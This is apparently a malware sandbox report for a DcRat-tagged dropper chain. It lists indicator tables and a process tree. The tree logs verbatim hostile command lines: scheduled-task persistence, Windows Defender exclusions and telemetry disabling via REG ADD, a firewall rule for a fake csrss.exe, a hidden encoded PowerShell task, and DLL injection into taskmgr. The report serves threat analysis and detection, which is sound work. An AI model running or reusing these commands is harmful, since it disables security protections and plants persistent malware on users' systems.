pid Process 1080 3zj66Wk.exe 1080 3zj66Wk.exe 3120 AppLaunch.exe 3120 AppLaunch.exe 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3320 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious behavior: MapViewOfSection 26 IoCs
pid Process 1080 3zj66Wk.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe 1060 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3120 AppLaunch.exe Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeDebugPrivilege 4056 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4056 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4056 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4056 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeDebugPrivilege 192 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 192 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE Token: SeCreatePagefilePrivilege 3320 Explorer.EXE Token: SeShutdownPrivilege 3320 Explorer.EXE -
Suspicious use of FindShellTrayWindow 12 IoCs
pid Process 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE 3320 Explorer.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3728 MicrosoftEdge.exe 2728 MicrosoftEdgeCP.exe 4056 MicrosoftEdgeCP.exe 2728 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4360 wrote to memory of 3836 4360 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 70 PID 4360 wrote to memory of 3836 4360 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 70 PID 4360 wrote to memory of 3836 4360 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 70 PID 3836 wrote to memory of 4016 3836 sq1VZ08.exe 71 PID 3836 wrote to memory of 4016 3836 sq1VZ08.exe 71 PID 3836 wrote to memory of 4016 3836 sq1VZ08.exe 71 PID 4016 wrote to memory of 4940 4016 mv6FC02.exe 72 PID 4016 wrote to memory of 4940 4016 mv6FC02.exe 72 PID 4016 wrote to memory of 4940 4016 mv6FC02.exe 72 PID 4940 wrote to memory of 4572 4940 va5Ca30.exe 73 PID 4940 wrote to memory of 4572 4940 va5Ca30.exe 73 PID 4940 wrote to memory of 4572 4940 va5Ca30.exe 73 PID 4572 wrote to memory of 3608 4572 mP9Sj06.exe 74 PID 4572 wrote to memory of 3608 4572 mP9Sj06.exe 74 PID 4572 wrote to memory of 3608 4572 mP9Sj06.exe 74 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 3608 wrote to memory of 3120 3608 1bs92YJ6.exe 75 PID 4572 wrote to memory of 4412 4572 mP9Sj06.exe 76 PID 4572 wrote to memory of 4412 4572 mP9Sj06.exe 76 PID 4572 wrote to memory of 4412 4572 mP9Sj06.exe 76 PID 4940 wrote to memory of 1080 4940 va5Ca30.exe 77 PID 4940 wrote to memory of 1080 4940 va5Ca30.exe 77 PID 4940 wrote to memory of 1080 4940 va5Ca30.exe 77 PID 4016 wrote to memory of 3304 4016 mv6FC02.exe 78 PID 4016 wrote to memory of 3304 4016 mv6FC02.exe 78 PID 4016 wrote to memory of 3304 4016 mv6FC02.exe 78 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3304 wrote to memory of 2940 3304 4ST961YO.exe 79 PID 3836 wrote to memory of 1936 3836 sq1VZ08.exe 80 PID 3836 wrote to memory of 1936 3836 sq1VZ08.exe 80 PID 3836 wrote to memory of 1936 3836 sq1VZ08.exe 80 PID 1936 wrote to memory of 196 1936 5tZ8WP7.exe 81 PID 1936 wrote to memory of 196 1936 5tZ8WP7.exe 81 PID 1936 wrote to memory of 196 1936 5tZ8WP7.exe 81 PID 4360 wrote to memory of 4200 4360 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 82 PID 4360 wrote to memory of 4200 4360 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 82 PID 4360 wrote to memory of 4200 4360 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 82 PID 196 wrote to memory of 4536 196 explothe.exe 83 PID 196 wrote to memory of 4536 196 explothe.exe 83 PID 196 wrote to memory of 4536 196 explothe.exe 83 PID 196 wrote to memory of 1476 196 explothe.exe 84 PID 196 wrote to memory of 1476 196 explothe.exe 84 PID 196 wrote to memory of 1476 196 explothe.exe 84 PID 4200 wrote to memory of 2396 4200 6If0Yv8.exe 87 PID 4200 wrote to memory of 2396 4200 6If0Yv8.exe 87 PID 1476 wrote to memory of 4876 1476 cmd.exe 89 PID 1476 wrote to memory of 4876 1476 cmd.exe 89 PID 1476 wrote to memory of 4876 1476 cmd.exe 89 PID 1476 wrote to memory of 4860 1476 cmd.exe 90 PID 1476 wrote to memory of 4860 1476 cmd.exe 90 PID 1476 wrote to memory of 4860 1476 cmd.exe 90 PID 1476 wrote to memory of 3756 1476 cmd.exe 92 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3320 -
C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe"C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe"2⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe7⤵
- Executes dropped EXE
PID:4412
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"6⤵PID:2940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F6⤵
- DcRat
- Creates scheduled task(s)
PID:4536
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:4876
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"7⤵PID:4860
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E7⤵PID:3756
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"7⤵PID:3040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵PID:4552
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E7⤵PID:3036
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main6⤵
- Loads dropped DLL
PID:5632
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ED00.tmp\ED10.tmp\ED11.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe"4⤵
- Checks computer location settings
PID:2396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3E1D.exeC:\Users\Admin\AppData\Local\Temp\3E1D.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:224 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4224 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TM0pC3TM.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3624 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\YD6bx5XP.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:5324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 5689⤵
- Program crash
PID:5412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe7⤵
- Executes dropped EXE
PID:5352
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3EE9.exeC:\Users\Admin\AppData\Local\Temp\3EE9.exe2⤵
- Executes dropped EXE
PID:516
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4071.bat" "2⤵
- Checks computer location settings
PID:1060
-
-
C:\Users\Admin\AppData\Local\Temp\4322.exeC:\Users\Admin\AppData\Local\Temp\4322.exe2⤵
- Executes dropped EXE
PID:5152
-
-
C:\Users\Admin\AppData\Local\Temp\442C.exeC:\Users\Admin\AppData\Local\Temp\442C.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
PID:5204
-
-
C:\Users\Admin\AppData\Local\Temp\4612.exeC:\Users\Admin\AppData\Local\Temp\4612.exe2⤵
- Executes dropped EXE
PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\EAA0.exeC:\Users\Admin\AppData\Local\Temp\EAA0.exe2⤵
- Executes dropped EXE
PID:5868 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵PID:3904
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵PID:1060
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
PID:5472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:1112
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2712
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5824
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:1112
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4088
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6844
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7016
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:3596
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:6360
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6388
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4972
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:1696
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:3504
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:6660 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:6320
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:2644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe6⤵
- Executes dropped EXE
PID:6236 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f7⤵PID:6984
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f7⤵PID:2144
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
PID:5708 -
C:\Users\Admin\AppData\Local\Temp\7zSF2C7.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:3236 -
C:\Users\Admin\AppData\Local\Temp\7zS73.tmp\Install.exe.\Install.exe /MKdidA "385119" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:924 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:764
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:4832
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:5344
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:2868
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3904 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:5564
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:5468
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:4700
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZKLshbed" /SC once /ST 03:36:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- DcRat
- Creates scheduled task(s)
PID:5564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZKLshbed"6⤵PID:5604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZKLshbed"6⤵PID:5656
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 04:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe\" 3Y /Tzsite_idQqV 385119 /S" /V1 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:3836
-
-
-
-
-
